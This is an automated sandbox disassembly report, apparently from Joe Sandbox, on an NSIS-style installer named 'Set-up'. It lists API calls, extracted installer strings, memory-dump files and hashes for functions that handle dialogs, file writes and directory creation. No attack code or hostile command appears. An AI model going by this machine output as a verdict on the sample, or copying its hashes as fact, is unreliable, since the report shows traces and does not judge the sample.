ShowWindow.USER32(?), ref: 004054D2
DestroyWindow.USER32 ref: 004054E6
SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
GetDlgItem.USER32(?,?), ref: 00405523
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
IsWindowEnabled.USER32(00000000), ref: 0040553E
GetDlgItem.USER32(?,00000001), ref: 004055ED
GetDlgItem.USER32(?,00000002), ref: 004055F7
SetClassLongW.USER32(?,000000F2,?), ref: 00405611
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
GetDlgItem.USER32(?,00000003), ref: 00405708
ShowWindow.USER32(00000000,?), ref: 0040572A
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
EnableWindow.USER32(?,?), ref: 00405757
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
EnableMenuItem.USER32(00000000), ref: 00405774
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
SetWindowTextW.USER32(?,00447240), ref: 004057DC
ShowWindow.USER32(?,0000000A), ref: 00405910

Strings

@rD, xrefs: 004057B9

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: @rD
API String ID: 3282139019-3814967855
Opcode ID: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
Opcode Fuzzy Hash: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

detailprint: %s, xrefs: 00401679
Aborting: "%s", xrefs: 0040161D
Jump: %d, xrefs: 00401602
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
Rename on reboot: %s, xrefs: 00401943
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
CreateDirectory: "%s" created, xrefs: 00401849
SetFileAttributes: "%s":%08X, xrefs: 0040177B
BringToFront, xrefs: 004016BD
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
Sleep(%d), xrefs: 0040169D
Call: %d, xrefs: 0040165A
CreateDirectory: "%s" (%d), xrefs: 004017BF
Rename failed: %s, xrefs: 0040194B
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
SetFileAttributes failed., xrefs: 004017A1
Rename: %s, xrefs: 004018F8

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
RegisterClassW.USER32(0046AD60), ref: 00405B0A
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B

Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30

ShowWindow.USER32(00000005,00000000), ref: 00405B91
LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
RegisterClassW.USER32(0046AD60), ref: 00405BD3
DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2

Strings

RichEd20, xrefs: 00405B9D
.DEFAULT\Control Panel\International, xrefs: 00405999
.exe, xrefs: 00405A3D
RichEdit, xrefs: 00405BC4
@rD, xrefs: 00405965
B%F, xrefs: 00405A1F
RichEdit20A, xrefs: 00405BB6, 00405BBB
RichEd32, xrefs: 00405BA8
@%F, xrefs: 004059F6
Control Panel\Desktop\ResourceLocale, xrefs: 00405972
_Nb, xrefs: 00405AD1

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-1650083594
Opcode ID: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
Opcode Fuzzy Hash: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

lstrcatW.KERNEL32(00000000,00000000,%AimedCitizens%,004CB0B0,00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,%AimedCitizens%,%AimedCitizens%,00000000,00000000,%AimedCitizens%,004CB0B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Strings

File: error, user cancel, xrefs: 00401B93
File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81
File: error, user abort, xrefs: 00401B53
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39
File: wrote %d to "%s", xrefs: 00401BD0
File: error creating "%s", xrefs: 00401AF0
%AimedCitizens%, xrefs: 00401A53, 00401A5C, 00401A69, 00401A7B, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: error, user retry, xrefs: 00401B40

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: %AimedCitizens%$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
API String ID: 4286501637-2813789825
Opcode ID: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
Opcode Fuzzy Hash: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403598
GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600

Strings

Null, xrefs: 0040367E
soft, xrefs: 00403675
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
Inst, xrefs: 0040366C
Error launching installer, xrefs: 004035D7

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033E7
GetTickCount.KERNEL32 ref: 00403464
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
wsprintfW.USER32 ref: 004034A4
WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A

Strings

P1B, xrefs: 004033A9
X1C, xrefs: 0040343C
... %d%%, xrefs: 0040349E
X1C, xrefs: 004033ED

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: ... %d%%$P1B$X1C$X1C
API String ID: 651206458-1535804072
Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
Opcode Fuzzy Hash: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GlobalFree.KERNELBASE(007DBCF8), ref: 00402387

Strings

Pop: stack empty, xrefs: 00401F2C
Exch: stack < %d elements, xrefs: 00401ED8
%AimedCitizens%, xrefs: 00401EFB, 00401F00, 00401F1A

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: %AimedCitizens%$Exch: stack < %d elements$Pop: stack empty
API String ID: 1459762280-2936906687
Opcode ID: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
Opcode Fuzzy Hash: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

GlobalFree.KERNELBASE(007DBCF8), ref: 00402387

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
